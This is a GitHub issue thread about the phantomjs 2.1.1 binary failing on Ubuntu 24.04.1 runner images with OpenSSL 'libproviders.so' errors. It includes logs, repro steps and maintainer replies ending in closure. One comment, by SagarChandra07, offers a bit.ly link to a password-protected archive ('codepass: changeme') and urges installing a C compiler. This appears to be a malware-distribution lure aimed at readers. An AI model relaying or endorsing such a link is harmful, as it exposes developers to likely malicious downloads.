### ISSUE TITLE
Ubuntu 24.04.1 breaks phantomjs

### ISSUE THREAD

**Issue by alexlamsl** [actions/runner-images#10698]
### Description

Both OS versions download the same binary:
```
Downloading https://github.com/Medium/phantomjs/releases/download/v2.1.1/phantomjs-2.1.1-linux-x86_64.tar.bz2
Saving to /tmp/phantomjs/phantomjs-2.1.1-linux-x86_64.tar.bz2
Receiving...

Received 22866K total.
Extracting tar contents (via spawned process)
Removing /home/runner/work/UglifyJS/UglifyJS/node_modules/phantomjs-prebuilt/lib/phantom
Copying extracted folder /tmp/phantomjs/phantomjs-2.1.1-linux-x86_64.tar.bz2-extract-1727576930261/phantomjs-2.1.1-linux-x86_64 -> /home/runner/work/UglifyJS/UglifyJS/node_modules/phantomjs-prebuilt/lib/phantom
Writing location.js file
Done. Phantomjs binary available at /home/runner/work/UglifyJS/UglifyJS/node_modules/phantomjs-prebuilt/lib/phantom/bin/phantomjs
```

Working on Ubuntu 22.04.5:
https://github.com/mishoo/UglifyJS/actions/runs/11088813350/job/30809163028#step:4:102

Failing on Ubuntu 24.04.1:
https://github.com/alexlamsl/UglifyJS/actions/runs/11087839260/job/30809405032#step:4:103
```
Auto configuration failed
140656825132864:error:25066067:DSO support routines:DLFCN_LOAD:could not load the shared library:dso_dlfcn.c:185:filename(libproviders.so): libproviders.so: cannot open shared object file: No such file or directory
140656825132864:error:25070067:DSO support routines:DSO_load:could not load the shared library:dso_lib.c:244:
140656825132864:error:0E07506E:configuration file routines:MODULE_LOAD_DSO:error loading dso:conf_mod.c:285:module=providers, path=providers
140656825132864:error:0E076071:configuration file routines:MODULE_RUN:unknown module name:conf_mod.c:222:module=providers
```

### Platforms affected

- [ ] Azure DevOps
- [X] GitHub Actions - Standard Runners
- [ ] GitHub Actions - Larger Runners

### Runner images affected

- [ ] Ubuntu 20.04
- [ ] Ubuntu 22.04
- [X] Ubuntu 24.04
- [ ] macOS 12
- [ ] macOS 13
- [ ] macOS 13 Arm64
- [ ] macOS 14
- [ ] macOS 14 Arm64
- [ ] macOS 15
- [ ] macOS 15 Arm64
- [ ] Windows Server 2019
- [ ] Windows Server 2022

### Image version and build link

20240922.1.0

https://github.com/alexlamsl/UglifyJS/actions/runs/11087839260/job/30809405032

### Is it regression?

https://github.com/mishoo/UglifyJS/actions/runs/11088813350/job/30809163028

### Expected behavior

The test proceeds executing `phantomjs`

### Actual behavior

`phantomjs` fails to execute:
```
Auto configuration failed
140656825132864:error:25066067:DSO support routines:DLFCN_LOAD:could not load the shared library:dso_dlfcn.c:185:filename(libproviders.so): libproviders.so: cannot open shared object file: No such file or directory
140656825132864:error:25070067:DSO support routines:DSO_load:could not load the shared library:dso_lib.c:244:
140656825132864:error:0E07506E:configuration file routines:MODULE_LOAD_DSO:error loading dso:conf_mod.c:285:module=providers, path=providers
140656825132864:error:0E076071:configuration file routines:MODULE_RUN:unknown module name:conf_mod.c:222:module=providers
```

### Repro steps

```sh
$ npm install graceful-fs@4.2.6 is-my-json-valid@2.20.5 phantomjs-prebuilt@2.1.14
$ ./node_modules/phantomjs-prebuilt/lib/phantom/bin/phantomjs --version
```

**Comment by SagarChandra07** [comment]
maybe this will help
https://bit.ly/47P0Nvo
Archive codepass: changeme
If you don't have the c compliator, install it.(gcc or clang)

**Comment by vidyasagarnimmagaddi** [comment]
Hi @alexlamsl ,Thank you for bringing this issue to us. We are looking into this issue and will update you on this issue after investigating

**Comment by vidyasagarnimmagaddi** [comment]
Hi @alexlamsl  , Could you please confirm still you are facing the issue.thanks

**Comment by vidyasagarnimmagaddi** [comment]
Hi @alexlamsl  , we observed the builds in your repository , it appears to be successful. Hence we are closing this issue. thanks
